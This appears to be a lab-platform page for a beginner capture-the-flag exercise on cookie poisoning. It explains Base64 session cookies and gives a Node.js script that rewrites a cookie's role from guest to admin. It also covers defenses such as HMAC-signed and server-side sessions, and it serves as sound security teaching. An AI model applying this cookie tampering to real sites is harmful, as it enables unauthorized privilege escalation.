
Hack the Cookie: Cookie Poisoning Attack

Tamper a Base64 session cookie to escalate from guest to admin

Difficulty: Very Easy · Updated 11 Jun 2026 · Free Access · Solution (Pro)
Tags: Cookie Poisoning · Session Tampering · Base64 Encoding · Privilege Escalation · Browser DevTools · Client-Side Security · Web Exploitation

Exploit a cookie poisoning flaw in a corporate portal: decode the Base64 session cookie, switch your role to admin, and capture the flag. Hands-on web security practice, no setup beyond your browser.

1 Flag · 50 XP · 57% Success Rate

Cookie poisoning is one of the most fundamental web security flaws, and understanding it is essential for anyone entering application security. HTTP cookies are small pieces of data that a server sets in the browser and that the browser sends back on later requests to that site. When a web application stores authorization decisions in client-side cookies without integrity protection, an attacker can tamper with those values to escalate privileges and reach restricted functionality. This hands-on HackerDNA lab lets you exploit exactly that mistake.

How Cookie-Based Authentication Works

Many applications use cookies to track sessions and store authentication state. After login, the server hands the browser a cookie holding session information. Sometimes that is a random session identifier that points to data kept on the server; other times it is the actual user data, for example a JSON object wrapped in a reversible encoding such as Base64. The security question is simple: does the server validate the cookie when it comes back, or does it trust whatever the client sends?

When an application stores a role, user ID, or permission flag directly in a cookie using reversible encoding instead of a cryptographic signature, it opens the door to cookie poisoning. An attacker decodes the cookie, changes the role from guest to admin, re-encodes it, and sends it back. If the server trusts the value, the attacker gains administrative access. That single missing check is why cookie tampering remains a staple of web security training and real-world bug bounty reports.

Base64 Is Encoding, Not Encryption

A common misconception is that a Base64 cookie is encrypted. Base64 is only an encoding that turns binary data into ASCII text, so it offers zero confidentiality. Any Base64 value decodes instantly with built-in browser tools, the atob() console function, or a command-line utility like base64 -d. A cookie value that begins with eyJ is a near-certain sign of JSON starting with {" and a key name, and trailing = characters are padding, not a secret. Developers who lean on Base64 to obscure sensitive cookie data are building a false sense of security that an attacker unwinds in seconds.
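As an added worked example (not code from the lab or from the target portal), here is the decode, edit, re-encode round trip the attack performs, written for Node.js. The cookie layout {"user":"guest","role":"guest"} and the field name role are assumptions for illustration; in the browser console the same two steps are JSON.parse(atob(value)) and btoa(JSON.stringify(obj)).

```javascript
// Added example, not the lab's code. Assumes the session cookie is Base64 of a
// JSON object with a "role" field; the sample below is constructed for the demo.

// Constructed sample: Base64 of {"user":"guest","role":"guest"}
const SAMPLE_COOKIE = 'eyJ1c2VyIjoiZ3Vlc3QiLCJyb2xlIjoiZ3Vlc3QifQ==';

// Quick tell that a value is Base64-encoded JSON: '{"' followed by a key name
// encodes to "eyJ" (or "eyI" when a digit or space follows the quote), and the
// value ends in zero to two "=" padding characters.
function looksLikeBase64Json(value) {
  return /^ey[IJ][A-Za-z0-9+/]*={0,2}$/.test(value);
}

// Base64 -> UTF-8 text -> object. Browser equivalent: JSON.parse(atob(value))
function decodeCookie(value) {
  return JSON.parse(Buffer.from(value, 'base64').toString('utf8'));
}

// Object -> JSON text -> Base64. Browser equivalent: btoa(JSON.stringify(obj))
function encodeCookie(obj) {
  return Buffer.from(JSON.stringify(obj), 'utf8').toString('base64');
}

// Change one field and return a value ready to paste into the DevTools
// Application > Cookies panel (or set with document.cookie = 'session=' + value).
function poisonRole(value, newRole) {
  const data = decodeCookie(value);
  data.role = newRole;
  return encodeCookie(data);
}

console.log('original :', decodeCookie(SAMPLE_COOKIE));
console.log('poisoned :', poisonRole(SAMPLE_COOKIE, 'admin'));
```

Run it with node and paste the printed value over the existing cookie in DevTools; whether the next request comes back as admin tells you whether the server validates the cookie or merely decodes it.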

Defending Against Cookie Poisoning

Secure applications never trust client-side data for authorization. Server-side sessions keep roles and permissions on the server and reference them with a random session ID that leaks nothing. When a cookie must carry user data, a cryptographic signature (HMAC) or authenticated encryption makes tampering detectable. A signature protects integrity only: anyone holding the cookie can still read the payload, so data that must stay confidential needs encryption as well as a MAC. Modern frameworks ship this for you: Flask with itsdangerous, Django signed cookies, and Express.js cookie-session all reject a modified cookie instead of trusting it. Practice the attack here, and you will recognize the defense everywhere.

What You Will Learn

  • Identify how web applications use cookies for authentication and session state
  • Decode and inspect Base64-encoded session cookies with browser developer tools
  • Modify a cookie role value to escalate privileges from guest to admin
  • Distinguish between encoding, signing, and encrypting cookie data
  • Apply cookie poisoning defenses such as HMAC-signed and server-side sessions

Prerequisites

  • Basic understanding of HTTP and web browsers
  • Familiarity with browser developer tools
  • No programming experience required

Ready to hack this lab?

Create a free account and start practicing cybersecurity hands-on.

Start Your Challenge

Launch your dedicated machine to begin hacking (~1-2 min setup, dedicated server, private instance, standard power).
New here? Here's what to do

  1. Click "Start Lab" above. You'll get your own private machine with an IP address.
  2. Explore the target. Open the IP in your browser and look for vulnerabilities.
  3. Find and submit flags. Flags are secret text strings hidden in the system; paste them below to score.
